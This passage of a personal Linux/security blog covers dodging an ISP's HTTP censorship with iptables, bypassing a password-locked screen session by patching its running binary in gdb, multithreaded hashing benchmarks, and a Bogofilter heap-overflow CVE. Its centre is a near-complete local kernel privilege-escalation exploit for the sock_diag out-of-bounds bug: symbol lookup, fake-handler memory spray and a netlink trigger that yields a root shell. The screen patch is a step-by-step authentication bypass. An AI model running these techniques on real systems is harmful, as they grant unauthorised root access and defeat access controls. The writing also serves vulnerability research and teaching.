 16.|-- host-88-80-29-58.cust.prq.se  0.0%     1  192.5 192.5 192.5 192.5   0.0

We now know that with a very high probability, all “connection termination” attempts from this close to us – relative to a TTL of 64, which is set by the sender – are the censorship proxy doing its work. So we simply ignore all packets with the RST or FIN flag set that come from port 80 too close to us:

for mask in FIN,PSH,ACK RST,ACK; do
    sudo iptables -I INPUT -p tcp --sport 80 \
       -m tcp --tcp-flags $mask $mask \
       -m ttl --ttl-gt 55 -m ttl --ttl-lt 64 \
       -j DROP;
done

NB: --ttl-gt matches only TTLs strictly greater than the given value, so catching the observed TTL of 57 requires --ttl-gt 56; I subtract one more to be on the safe side. You can also leave out the TTL part, but then “regular” TCP terminations remain unseen by the OS, which many programs will find weird (and sometimes data comes with a packet that closes the connection, and this data would be lost).
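To make the matching logic of the two rules explicit, here is a small userspace model in C. It is only a sketch of my reading of the rules above, not of how netfilter is implemented, and would_drop and all_set are hypothetical names.

```c
#include <stdbool.h>
#include <stdint.h>

#define FLAG_FIN 0x01
#define FLAG_RST 0x04
#define FLAG_PSH 0x08
#define FLAG_ACK 0x10

/* "--tcp-flags MASK MASK": every bit named in the mask must be set */
static bool all_set(uint8_t flags, uint8_t mask)
{
    return (flags & mask) == mask;
}

/* Model of the two DROP rules: source port 80, one of the two flag
 * combinations, and 55 < ttl < 64 (both comparisons are strict,
 * like --ttl-gt and --ttl-lt). */
bool would_drop(uint16_t sport, uint8_t flags, uint8_t ttl)
{
    if (sport != 80)
        return false;
    if (!all_set(flags, FLAG_FIN | FLAG_PSH | FLAG_ACK) &&
        !all_set(flags, FLAG_RST | FLAG_ACK))
        return false;
    return ttl > 55 && ttl < 64;
}
```

A FIN-PSH-ACK packet arriving with TTL 57 is dropped, while the same flags on a packet that has travelled 16 hops (TTL 48) pass through untouched.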

That’s it. Since the first reply packet from the server is dropped, or rather replaced with the packet containing the <iframe> code, we rely on TCP retransmission, and sure enough, some 0.21 seconds later the same TCP packet is retransmitted, this time not harmed in any way.

The OS re-orders the packets and is able to assemble the TCP stream. Thus, by simply ignoring two packets the provider sends to us, we have an (almost perfectly) working TCP connection to wherever we want.

Why like this?

I suppose the provider is using relatively old Cisco equipment. For example, some of their documentation hints at how the filtering is implemented. See this PDF, p. 39-5:

When filtering is enabled and a request for content is directed through the security appliance, the request is sent to the content server and to the filtering server at the same time. If the filtering server allows the connection, the security appliance forwards the response from the content server to the originating client. If the filtering server denies the connection, the security appliance drops the response and sends a message or return code indicating that the connection was not successful.

The other big provider in the UAE uses a different filtering technique, which does not rely on TCP hacks but employs a real HTTP proxy. (I heard someone mention “Bluecoat” but have no data to back it up.)

posted 2013-04-15 ∴ tagged censorship, security, dubai, linux and iptables

Locking a screen session

The famous screen program – luckily by now mostly obsolete thanks to tmux – has a feature to “password lock” a session. The manual:

This is useful if you have privileged programs running under screen and you want to protect your session from reattach attempts by another user masquerading as your uid (i.e. any superuser.)

This is of course utter crap. As the super user, you can do anything you like, including changing a program’s executable at run time, which I want to demonstrate for screen as a POC.

The password is checked on the server side (which usually runs with setuid root) here:

if (strncmp(crypt(pwdata->buf, up), up, strlen(up))) {
    ...
    AddStr("\r\nPassword incorrect.\r\n");
    ...
}

If I am root, I can patch the running binary. Ultimately, I want to circumvent this password check. But we need to do some preparation:

First, find the string about the incorrect password that is passed to AddStr. Since this is a compile-time constant, it is stored in the .rodata section of the ELF.

Just fire up GDB on the screen binary, list the sections (redacted for brevity here)…

(gdb) maintenance info sections
Exec file:
    `/usr/bin/screen', file type elf64-x86-64.
    ...
    0x00403a50->0x0044ee8c at 0x00003a50: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x0044ee8c->0x0044ee95 at 0x0004ee8c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x0044eea0->0x00458a01 at 0x0004eea0: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
    ...

… and search for said string in the .rodata section:

(gdb) find 0x0044eea0, 0x00458a01, "\r\nPassword incorrect.\r\n"
0x45148a
warning: Unable to access target memory at 0x455322, halting search.
1 pattern found.

Now, we need to locate the piece of code comparing the password. Let’s first search for the call to AddStr by taking advantage of the fact that we know the address of the string that will be passed as the argument. We search in .text for the address of the string:

(gdb) find 0x00403a50, 0x0044ee8c, 0x45148a
0x41b371
1 pattern found.

Now there should be a jne instruction shortly before that (this instruction stands for “jump if not equal” and has the opcode 0x75). Let’s search for it:

(gdb) find/b 0x41b371-0x100, +0x100, 0x75
0x41b2f2
1 pattern found.

Decode the instruction:

(gdb) x/i 0x41b2f2
   0x41b2f2:    jne    0x41b370

This is it. (If you want to be sure, search the instructions before that. Shortly before that, at 0x41b2cb, I find: callq 403120 <strncmp@plt>.)

Now we can simply patch the live binary, changing 0x75 to 0x74 (jne to je or “jump if equal”), thus effectively inverting the if expression. Find the screen server process (it’s written in all caps in the ps output, i.e. SCREEN) and patch it like this, where =(cmd) is a Z-Shell shortcut for “create temporary file and delete it after the command finishes”:

$ sudo gdb -batch -p 23437 -x =(echo "set *(unsigned char *)0x41b2f2 = 0x74\nquit")

All done. Just attach using screen -x, but be sure not to enter the correct password: That’s the only one that will not give you access now.
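The patch itself is a one-byte change. As an illustration, here is a C sketch that performs the same flip on an in-memory copy of the instruction bytes (not on a live process). invert_jne is a name invented for this example; the opcodes 0x75 and 0x74 are the ones named above.

```c
#include <stddef.h>
#include <stdint.h>

#define OPCODE_JNE_SHORT 0x75  /* jne rel8 */
#define OPCODE_JE_SHORT  0x74  /* je  rel8 */

/* Flip a short jne into a short je at the given offset.
 * Returns 0 on success, -1 if the offset is out of range
 * or the byte there is not a jne opcode. */
int invert_jne(uint8_t *code, size_t len, size_t offset)
{
    if (offset >= len || code[offset] != OPCODE_JNE_SHORT)
        return -1;
    code[offset] = OPCODE_JE_SHORT;
    return 0;
}
```

The displacement byte that follows the opcode stays untouched, so the jump target is the same; only the condition is inverted. Checking the old byte first guards against patching the wrong address.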

posted 2013-03-12 ∴ tagged linux, c and security

Privilege Escalation Kernel Exploit

So my friend Nico tweeted that there is an “easy linux kernel privilege escalation” and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some Russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, as I discovered later. They differ in technique and reliability, and I guess others can do better than me.

I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

So we should do exactly that! One of the hardest parts was actually finding out how to send such a NetLink message, but I’ll come to that later. Let’s first have a look at the code that was patched (this is from net/core/sock_diag.c):

static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
{
    int err;
    struct sock_diag_req *req = nlmsg_data(nlh);
    const struct sock_diag_handler *hndl;

    if (nlmsg_len(nlh) < sizeof(*req))
        return -EINVAL;

    /* check for "req->sdiag_family >= AF_MAX" goes here */

    hndl = sock_diag_lock_handler(req->sdiag_family);
    if (hndl == NULL)
        err = -ENOENT;
    else
        err = hndl->dump(skb, nlh);
    sock_diag_unlock_handler(hndl);

    return err;
}

The function sock_diag_lock_handler() locks a mutex and effectively returns sock_diag_handlers[req->sdiag_family], i.e. the array entry selected by the unsanitized family number received in the NetLink request. Since AF_MAX is 40, we can effectively return memory from after the end of sock_diag_handlers (“out-of-bounds access”) if we specify a family greater than or equal to 40. This memory is accessed as a

struct sock_diag_handler {
    __u8 family;
    int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);
};

… and err = hndl->dump(skb, nlh); calls the function pointed to in the dump field.
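For contrast, this is roughly what the lookup looks like with the range check in place. It is a userspace model written for this post, not the Kernel code: the struct, the array and lookup_handler are stand-ins, and AF_MAX_MODEL simply mirrors the value 40 quoted above.

```c
#include <stddef.h>

#define AF_MAX_MODEL 40   /* value of AF_MAX quoted in the text */

/* Simplified stand-in for struct sock_diag_handler */
struct handler_model {
    unsigned char family;
    int (*dump)(void);
};

static const struct handler_model *handlers[AF_MAX_MODEL];

/* Lookup with the missing range check added: any family at or
 * past the end of the array is rejected instead of being used
 * as an index. */
const struct handler_model *lookup_handler(unsigned int family)
{
    if (family >= AF_MAX_MODEL)
        return NULL;
    return handlers[family];
}
```

With this check, a request for family 40 or above never touches memory behind the array.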

So we know: The Kernel follows a pointer to a sock_diag_handler struct, and calls the function stored there. If we find some suitable and (more or less) predictable value after the end of the array, then we might store a specially crafted struct at the referenced address that contains a pointer to some code that will escalate the privileges of the current process. The main function looks like this:

int main(int argc, char **argv)
{
    prepare_privesc_code();
    spray_fake_handler((void *)0x0000000000010000);
    trigger();
    return execv("/bin/sh", (char *[]) { "sh", NULL });
}

First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.

/* privilege escalation code */
#define KERNCALL __attribute__((regparm(3)))
void * (*prepare_kernel_cred)(void *) KERNCALL;
void * (*commit_creds)(void *) KERNCALL;

/* match the signature of a sock_diag_handler dumper function */
int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)
{
    commit_creds(prepare_kernel_cred(0));
    return 0;
}

/* look up an exported Kernel symbol */
void *findksym(const char *sym)
{
    void *p, *ret;
    FILE *fp;
    char s[1024];
    size_t sym_len = strlen(sym);

    fp = fopen("/proc/kallsyms", "r");
    if(!fp)
        err(-1, "cannot open kallsyms: fopen");

    ret = NULL;
    while(fscanf(fp, "%p %*c %1023s\n", &p, s) == 2) {
        if(!!strncmp(sym, s, sym_len))
            continue;
        ret = p;
        break;
    }
    fclose(fp);
    return ret;
}

void prepare_privesc_code(void)
{
    prepare_kernel_cred = findksym("prepare_kernel_cred");
    commit_creds = findksym("commit_creds");
}

This is pretty standard, and you’ll find many variations of that in different exploits.
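The lookup boils down to parsing lines of the form “address type name”. Here is a sketch of that step on a single line, using sscanf instead of fscanf so it can be tried without reading /proc/kallsyms. match_ksym_line is a hypothetical helper, and unlike the strncmp() call above it compares the whole name, so a longer symbol that merely starts with the wanted name does not match.

```c
#include <stdio.h>
#include <string.h>

/* Parse one line in the "address type name" layout of /proc/kallsyms.
 * Returns 1 and fills *addr if the symbol name matches exactly, else 0. */
int match_ksym_line(const char *line, const char *sym, unsigned long long *addr)
{
    unsigned long long a;
    char type;
    char name[256];

    /* %255s leaves room for the terminating NUL in name[256] */
    if (sscanf(line, "%llx %c %255s", &a, &type, name) != 3)
        return 0;
    if (strcmp(name, sym) != 0)
        return 0;
    *addr = a;
    return 1;
}
```

Lines for module symbols carry an extra “[module]” column, which this sketch simply ignores.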

Now we spray a struct containing this function pointer over a sizable amount of memory:

void spray_fake_handler(const void *addr)
{
    void *pp;
    int po;

    /* align to page boundary */
    pp = (void *) ((ulong)addr & ~0xfffULL);

    pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if(pp == MAP_FAILED)
        err(-1, "mmap");

    struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };
    for(po = 0; po < 0x10000; po += sizeof(hndl))
        memcpy(pp + po, &hndl, sizeof(hndl));
}

The memory is mapped with MAP_FIXED, which makes mmap() take the memory location as the de facto location, not merely a hint. The location must be a multiple of the page size (which is 4096 or 0x1000 by default), and on most modern systems you cannot map the zero-page (or other low pages); consult sysctl vm.mmap_min_addr for the lowest address you may map. (This is to foil attempts to map code to the zero-page to take advantage of a Kernel NULL pointer dereference.)
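The page alignment is plain bit masking. A tiny sketch, assuming the default page size of 4096 bytes mentioned above (page_align_down and PAGE_SIZE_ASSUMED are names made up here):

```c
#include <stdint.h>

#define PAGE_SIZE_ASSUMED 0x1000ULL  /* 4096, the default named in the text */

/* Round an address down to the start of the page containing it. */
uint64_t page_align_down(uint64_t addr)
{
    return addr & ~(PAGE_SIZE_ASSUMED - 1);
}
```

An address that is already a multiple of the page size, such as 0x10000, comes back unchanged.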

Now for the actual trigger. To get an idea of what we can do, we should first inspect what comes after the sock_diag_handlers array in the currently running Kernel (this is only possible with root permissions). Since the array is static to that file, we cannot look up the symbol. Instead, we look up the address of a function that accesses said array, sock_diag_register():

$ grep -w sock_diag_register /proc/kallsyms
ffffffff812b6aa2 T sock_diag_register

If this returns all zeroes, try grepping in /boot/System.map-$(uname -r) instead. Then disassemble the function. I annotated the relevant points with the corresponding C code:

$ sudo gdb -c /proc/kcore
(gdb) x/23i 0xffffffff812b6aa2
0xffffffff812b6aa2:  push   %rbp
0xffffffff812b6aa3:  mov    %rdi,%rbp
0xffffffff812b6aa6:  push   %rbx
0xffffffff812b6aa7:  push   %rcx
0xffffffff812b6aa8:  cmpb   $0x27,(%rdi)                ; if (hndl->family >= AF_MAX)
0xffffffff812b6aab:  ja     0xffffffff812b6ae5
0xffffffff812b6aad:  mov    $0xffffffff81668c20,%rdi
0xffffffff812b6ab4:  mov    $0xfffffff0,%ebx
0xffffffff812b6ab9:  callq  0xffffffff813628ee          ; mutex_lock(&sock_diag_table_mutex);
0xffffffff812b6abe:  movzbl 0x0(%rbp),%eax
0xffffffff812b6ac2:  cmpq   $0x0,-0x7e7fe930(,%rax,8)   ; if (sock_diag_handlers[hndl->family])
0xffffffff812b6acb:  jne    0xffffffff812b6ad7
0xffffffff812b6acd:  mov    %rbp,-0x7e7fe930(,%rax,8)   ; sock_diag_handlers[hndl->family] = hndl;
0xffffffff812b6ad5:  xor    %ebx,%ebx
0xffffffff812b6ad7:  mov    $0xffffffff81668c20,%rdi
0xffffffff812b6ade:  callq  0xffffffff813628db
0xffffffff812b6ae3:  jmp    0xffffffff812b6aea
0xffffffff812b6ae5:  mov    $0xffffffea,%ebx
0xffffffff812b6aea:  pop    %rdx
0xffffffff812b6aeb:  mov    %ebx,%eax
0xffffffff812b6aed:  pop    %rbx
0xffffffff812b6aee:  pop    %rbp
0xffffffff812b6aef:  retq

The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value at the address -0x7e7fe930 (which is a shorthand for 0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight being the size of a pointer on a 64-bit system, and %rax holding the family field: the preceding movzbl 0x0(%rbp),%eax loads the first byte of the struct that the function’s first argument points to, and family is the first member of that (not packed) struct. So this line is an array access, and we know that sock_diag_handlers is located at -0x7e7fe930.
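The address computation behind an operand of the form disp(,%index,scale) can be replayed in C. This is just the arithmetic, with effective_address as a name invented for the sketch:

```c
#include <stdint.h>

/* Effective address of an operand written as disp(,%index,scale):
 * the 32-bit displacement is sign-extended to 64 bits, then
 * index * scale is added. */
uint64_t effective_address(int32_t disp, uint64_t index, uint64_t scale)
{
    return (uint64_t)(int64_t)disp + index * scale;
}
```

Calling effective_address(-0x7e7fe930, 0, 8) yields 0xffffffff818016d0, the start of the array on my system; every increment of the index moves the address by one 8-byte pointer.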

(All these steps can actually be done without root permissions: You can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r) && dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start GDB on the resulting ELF file. Only from this point on do you actually need to inspect the main memory.)

(gdb) x/46xg -0x7e7fe930
0xffffffff818016d0:     0x0000000000000000      0x0000000000000000
0xffffffff818016e0:     0x0000000000000000      0x0000000000000000
0xffffffff818016f0:     0x0000000000000000      0x0000000000000000
0xffffffff81801700:     0x0000000000000000      0x0000000000000000
0xffffffff81801710:     0x0000000000000000      0x0000000000000000
0xffffffff81801720:     0x0000000000000000      0x0000000000000000
0xffffffff81801730:     0x0000000000000000      0x0000000000000000
0xffffffff81801740:     0x0000000000000000      0x0000000000000000
0xffffffff81801750:     0x0000000000000000      0x0000000000000000
0xffffffff81801760:     0x0000000000000000      0x0000000000000000
0xffffffff81801770:     0x0000000000000000      0x0000000000000000
0xffffffff81801780:     0x0000000000000000      0x0000000000000000
0xffffffff81801790:     0x0000000000000000      0x0000000000000000
0xffffffff818017a0:     0x0000000000000000      0x0000000000000000
0xffffffff818017b0:     0x0000000000000000      0x0000000000000000
0xffffffff818017c0:     0x0000000000000000      0x0000000000000000
0xffffffff818017d0:     0x0000000000000000      0x0000000000000000
0xffffffff818017e0:     0x0000000000000000      0x0000000000000000
0xffffffff818017f0:     0x0000000000000000      0x0000000000000000
0xffffffff81801800:     0x0000000000000000      0x0000000000000000
0xffffffff81801810:     0x0000000000000000      0x0000000000000000
0xffffffff81801820:     0x000000000000000a      0x0000000000017570
0xffffffff81801830:     0xffffffff8135a666      0xffffffff816740a0

(gdb) p (0xffffffff81801828- -0x7e7fe930)/8
$1 = 43

So now I know that in the Kernel I’m currently running, at the current moment, sock_diag_handlers[43] is 0x0000000000017570, which is a low address, but hopefully not too low. (Nico reported 0x17670, and a current grml live cd in KVM has 0x17470 there.) So we need to send a NetLink message with SOCK_DIAG_BY_FAMILY type set in the header, flags at least NLM_F_REQUEST and the family set to 43. This is what the trigger does:

void trigger(void)
{
    int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);
    if (nl < 0)
        err(-1, "socket");

    struct {
        struct nlmsghdr hdr;
        struct sock_diag_req r;
    } req;

    memset(&req, 0, sizeof(req));
    req.hdr.nlmsg_len = sizeof(req);
    req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.hdr.nlmsg_flags = NLM_F_REQUEST;
    req.r.sdiag_family = 43; /* guess right offset */

    if(send(nl, &req, sizeof(req), 0) < 0)
        err(-1, "send");
}

All done! Compiling might be difficult, since you need Kernel struct definitions. I used -idirafter and my Kernel headers.

$ make
gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c
$ ./kex
# id
uid=0(root) gid=0(root) groups=0(root)

Note: If something goes wrong, you’ll get a scary-looking “general protection fault: 0000 [#1] SMP”.

But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…

Update: The Protection Fault occurs when first following a bogus function pointer. After that, the exploit can no longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)

posted 2013-02-26 ∴ tagged linux, c and security

Concurrent Hashing is an Embarrassingly Parallel Problem

So I was reading some rather not so clever code today. I had a gut feeling something was wrong with the code, since I had never seen an idiom like that. A server that does a little hash calculation with lots of threads – and the function that computes the hash had a peculiar feature: Its entire body was wrapped in a lock/unlock pair on a function-static mutex initialized with PTHREAD_MUTEX_INITIALIZER, like this:

static EVP_MD_CTX mdctx;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned char first = 1;

pthread_mutex_lock(&lock);
if (first) {
    EVP_MD_CTX_init(&mdctx);
    first = 0;
}

/* the actual hash computation using &mdctx */

pthread_mutex_unlock(&lock);

In other words, if this function is called multiple times from different threads, it is only run once at a time, possibly waiting for other instances to unlock the (shared) mutex first.

The computation code inside the function looks roughly like this:

if (!EVP_DigestInit_ex(&mdctx, EVP_sha256(), NULL) ||
    !EVP_DigestUpdate(&mdctx, input, inputlen) ||
    !EVP_DigestFinal(&mdctx, hash, &md_len)) {
        ERR_print_errors_fp(stderr);
        exit(-1);
}

This is the typical OpenSSL pattern: You tell it to initialize mdctx to compute the SHA256 digest, then you “update” the digest (i.e., you feed it some bytes) and then you tell it to finish, storing the resulting hash in hash. If any of the functions fails, the OpenSSL error is printed.

So the lock mutex really only protects the mdctx (short for ‘message digest context’). And my gut feeling was that re-initializing the context all the time (i.e. copying stuff around) is much cheaper than synchronizing all the hash operations (i.e., having one stupid bottleneck).
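To illustrate the point about local state: a function whose working state lives entirely on its own stack can be called from any number of threads without a mutex. The sketch below uses 32-bit FNV-1a as a stand-in for the SHA256 digest, purely to stay self-contained. It is not what the server code used, and hash_local is a name made up for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit FNV-1a. All state is the local variable h, so concurrent
 * callers never share anything and no lock is needed. */
uint32_t hash_local(const unsigned char *input, size_t len)
{
    uint32_t h = 2166136261u;          /* FNV offset basis */
    size_t i;

    for (i = 0; i < len; i++) {
        h ^= input[i];
        h *= 16777619u;                /* FNV prime */
    }
    return h;
}
```

The OpenSSL equivalent is a context that is declared and initialized inside the function instead of being static.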

To be sure, I ran a few tests. I wrote a simple C program that scales up the number of threads and looks at how much time you need to hash 10 million 16-byte strings. (You can find the whole quick’n’dirty code on Github.)

First, I have to create a dataset. In order for it to be the same all the time, I use rand_r() with a hard-coded seed, so that over all iterations, the random data set is actually equivalent:

#define DATANUM 10000000
#define DATASIZE 16
static char data[DATANUM][DATASIZE];

void init_data(void)
{
    int n, i;
    unsigned int seedp = 0xdeadbeef; /* make the randomness predictable */
    char alpha[] = "abcdefghijklmnopqrstuvwxyz";

    for(n = 0; n < DATANUM; n++)
            for(i = 0; i < DATASIZE; i++)
                    data[n][i] = alpha[rand_r(&seedp) % 26];
}

Next, you have to give a helping hand to OpenSSL so that it can be run multithreaded. (There are, it seems, certain internal data structures that need protection.) This is a technical detail.

Then I start num threads on equally-sized slices of data while recording and printing out timing statistics:

void hash_all(int num)
{
    int i;
    pthread_t *t;
    struct fromto *ft;
    struct timespec start, end;
    double delta;

    clock_gettime(CLOCK_MONOTONIC, &start);

    t = malloc(num * sizeof *t);
    for(i = 0; i < num; i++) {
        ft = malloc(sizeof(struct fromto));
        ft->from = i * (DATANUM/num);
        /* the last slice also takes the remainder of the integer division */
        ft->to = (i == num - 1) ? DATANUM : (i+1) * (DATANUM/num);
        pthread_create(&t[i], NULL, hash_slice, ft);
    }

    for(i = 0; i < num; i++)
            pthread_join(t[i], NULL);

    clock_gettime(CLOCK_MONOTONIC, &end);

    delta = end.tv_sec - start.tv_sec;
    delta += (end.tv_nsec - start.tv_nsec) / 1000000000.0;

    printf("%d threads: %lu hashes/s, total = %.3fs\n",
            num, (unsigned long) (DATANUM / delta), delta);
    free(t);
    sleep(1);
}
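The slicing arithmetic in hash_all() can be isolated into a small helper. This is a sketch with slice_bounds as a hypothetical name, and it assumes that hash_slice() treats the range as half-open. It hands the remainder of the integer division to the last worker, so that for example 12 workers cover all 10 million entries rather than only 12 × 833333 = 9999996 of them.

```c
#include <stddef.h>

/* Half-open range [from, to) handled by worker i out of num.
 * The last worker also takes the remainder of total / num. */
void slice_bounds(size_t total, size_t num, size_t i, size_t *from, size_t *to)
{
    size_t per = total / num;

    *from = i * per;
    *to = (i == num - 1) ? total : (i + 1) * per;
}
```

For the benchmark numbers the difference is negligible, but with small data sets and many threads the dropped remainder would become noticeable.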

Each thread runs the hash_slice() function, which linearly iterates over the slice and calls hash_one(n) for each entry. With preprocessor macros, I define two versions of this function:

void hash_one(int num)
{
    int i;
    unsigned char hash[EVP_MAX_MD_SIZE];
    unsigned int md_len;

#ifdef LOCK_STATIC_EVP_MD_CTX
    static EVP_MD_CTX mdctx;
    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static unsigned char first = 1;

    pthread_mutex_lock(&lock);
    if (first) {
            EVP_MD_CTX_init(&mdctx);
            first = 0;
    }
#else
    EVP_MD_CTX mdctx;
    EVP_MD_CTX_init(&mdctx);
#endif

    /* the actual hashing from above */

#ifdef LOCK_STATIC_EVP_MD_CTX
    pthread_mutex_unlock(&lock);
#endif

    return;
}

The Makefile produces two binaries:

$ make
gcc -Wall -pthread -lrt -lssl -DLOCK_STATIC_EVP_MD_CTX -o speedtest-locked speedtest.c
gcc -Wall -pthread -lrt -lssl -o speedtest-copied speedtest.c

… and the result is as expected. On my Intel i7-2620M (a dual-core CPU with four hardware threads):

$ ./speedtest-copied
1 threads: 1999113 hashes/s, total = 5.002s
2 threads: 3443722 hashes/s, total = 2.904s
4 threads: 3709510 hashes/s, total = 2.696s
8 threads: 3665865 hashes/s, total = 2.728s
12 threads: 3650451 hashes/s, total = 2.739s
24 threads: 3642619 hashes/s, total = 2.745s

$ ./speedtest-locked
1 threads: 2013590 hashes/s, total = 4.966s
2 threads: 857542 hashes/s, total = 11.661s
4 threads: 631336 hashes/s, total = 15.839s
8 threads: 932238 hashes/s, total = 10.727s
12 threads: 850431 hashes/s, total = 11.759s
24 threads: 802501 hashes/s, total = 12.461s

And on an Intel Xeon X5650 24 core machine:

$ ./speedtest-copied
1 threads: 1564546 hashes/s, total = 6.392s
2 threads: 1973912 hashes/s, total = 5.066s
4 threads: 3821067 hashes/s, total = 2.617s
8 threads: 5096136 hashes/s, total = 1.962s
12 threads: 5849133 hashes/s, total = 1.710s
24 threads: 7467990 hashes/s, total = 1.339s

$ ./speedtest-locked
1 threads: 1481025 hashes/s, total = 6.752s
2 threads: 701797 hashes/s, total = 14.249s
4 threads: 338231 hashes/s, total = 29.566s
8 threads: 318873 hashes/s, total = 31.360s
12 threads: 402054 hashes/s, total = 24.872s
24 threads: 304193 hashes/s, total = 32.874s

So, while the real computation times shrink when you don’t force a bottleneck – yes, it’s an embarrassingly parallel problem – the reverse happens if you force synchronization: All the mutex waiting slows the program down so much that you’d better only use one thread or else you lose.

Rule of thumb: If you don’t have a good argument for a multithreading application, simply don’t take the extra effort of implementing it in the first place.

posted 2012-12-12 ∴ tagged c and linux

Details on CVE-2012-5468

In mid-2010 I found a heap corruption in Bogofilter which led to the Security Advisory 2010-01, CVE-2010-2494 and a new release. – Some weeks ago I found another similar bug, so there’s a new Bogofilter release since yesterday, thanks to the maintainers. (Neither of the bugs has much potential for exploitation, for different reasons.)

I want to shed some light on the details about the new CVE-2012-5468 here: It’s a very subtle bug that arises from the error handling of the character set conversion library iconv.

The Bogofilter Security Advisory 2012-01 contains no real information about the source of the heap corruption. The full description in the advisory is this:

Julius Plenz figured out that bogofilter's/bogolexer's base64 could overwrite heap memory in the character set conversion in certain pathological cases of invalid base64 code that decodes to incomplete multibyte characters.

The problematic code doesn’t look problematic at first glance. Nor at second glance. Take a look yourself. The version here is abridged for brevity: it converts from inbuf to outbuf, handling possible iconv failures.

count = iconv(xd, (ICONV_CONST char **)&inbuf, &inbytesleft, &outbuf, &outbytesleft);

if (count == (size_t)(-1)) {
    int err = errno;
    switch (err) {
    case EILSEQ: /* invalid multibyte sequence */
    case EINVAL: /* incomplete multibyte sequence */
        if (!replace_nonascii_characters)
            *outbuf = *inbuf;
        else
            *outbuf = '?';

        /* update counts and pointers */
        inbytesleft -= 1;
        outbytesleft -= 1;
        inbuf += 1;
        outbuf += 1;
        break;

    case E2BIG: /* output buffer has no more room */
                /* TODO: Provide proper handling of E2BIG */
        done = true;
        break;

    default:
        break;
    }
}

The iconv API is simple and straightforward: You pass a handle (which among other things contains the source and destination character set; it is called xd here), and two buffers and modifiable integers for the input and output, respectively. (Usually, when transcoding, the function reads one symbol from the source, converts it to another character set, and then “drains” the input buffer by decreasing inbytesleft by the number of bytes that made up the source symbol. Then, the output length is checked, and if the target symbol fits, it is appended and the outbytesleft integer is decreased by how much space the symbol used.)

The API function returns -1 in case of an error. The Bogofilter code contains a copy&paste of the error cases from the iconv(3) man page. If you read the libiconv source carefully, you’ll find that …

/* Case 2: not enough bytes available to detect anything */
errno = EINVAL;

comes before

/* Case 4: k bytes read, making up a wide character */
if (outleft == 0) {
    cd->istate = last_istate;
    errno = E2BIG;
    ...
}

So the “certain pathological cases” the SA talks about are met if a sufficiently large chunk of data makes iconv return -1, because this chunk just happens to end in an incomplete multibyte sequence.

But at that point you have no guarantee from the library that your output buffer can take any more bytes. Appending that character or a ? sign causes an out-of-bounds write. (This is really subtle. I don’t blame anyone for not noticing this, although sanity checks – if need be via assert(outbytesleft > 0) – are always in order when you do complicated modify-string-on-copy stuff.) Additionally, outbytesleft is an unsigned size_t, so decreasing it below zero wraps it around to (size_t)-1, and thus even a later outbytesleft == 0 check will evaluate to false.
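A guarded version of the fallback could look like the following sketch. It is not the actual Bogofilter fix, just an illustration of the missing check; copy_one_byte is a hypothetical helper whose parameters mirror the variables in the snippet above.

```c
#include <stddef.h>

/* Fallback for EILSEQ/EINVAL: copy one input byte (or '?') to the
 * output, but only if both buffers still have room.
 * Returns 0 on success, -1 if nothing could be copied. */
int copy_one_byte(const char **inbuf, size_t *inbytesleft,
                  char **outbuf, size_t *outbytesleft,
                  int replace_nonascii)
{
    if (*inbytesleft == 0 || *outbytesleft == 0)
        return -1;

    **outbuf = replace_nonascii ? '?' : **inbuf;

    /* update counts and pointers; neither counter can wrap here */
    *inbytesleft -= 1;
    *outbytesleft -= 1;
    *inbuf += 1;
    *outbuf += 1;
    return 0;
}
```

When the function returns -1 because the output is full, the caller is in the same situation as with E2BIG and has to flush or grow the output buffer before retrying.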

Once you know this, the fix is trivial. And if you dig deep enough in their SVN, there’s my original test to reproduce this.

How do you find bugs like this? – Not without an example message that makes Bogofilter crash reproducibly. In this case it was real mail with a big PDF file attachment sent via my university's mail server. Because Bogofilter would repeatedly crash trying to parse the message, at some point a Nagios check alerted us that one mail in the queue was delayed for more than an hour. So we made a copy of it to examine the bug more closely. A little Valgrinding later, and you know where to start your search for the out-of-bounds write.

posted 2012-12-05 ∴ tagged linux, c, security, spam and university

Live and in color in Hamburg

Fancy hearing what I have to say? I’ll be a guest at two events in Hamburg this month: First, tomorrow, at a panel discussion at Kultwerk West on the topic: Theater subscriptions for IT specialists? Joachim Lux, Shahab Din and Julius Plenz on culture and nerds and Lux’ understanding of being human.

And as every year, in two weeks I’ll also be at the Software Freedom Day, this time with a talk on bufferbloat and a small Git workshop for beginners. Promisingly, this year there are two parallel talk tracks in new premises. I’m looking forward to it!

posted 2012-09-03 ∴ tagged life and linux

IPv6 ... here I come

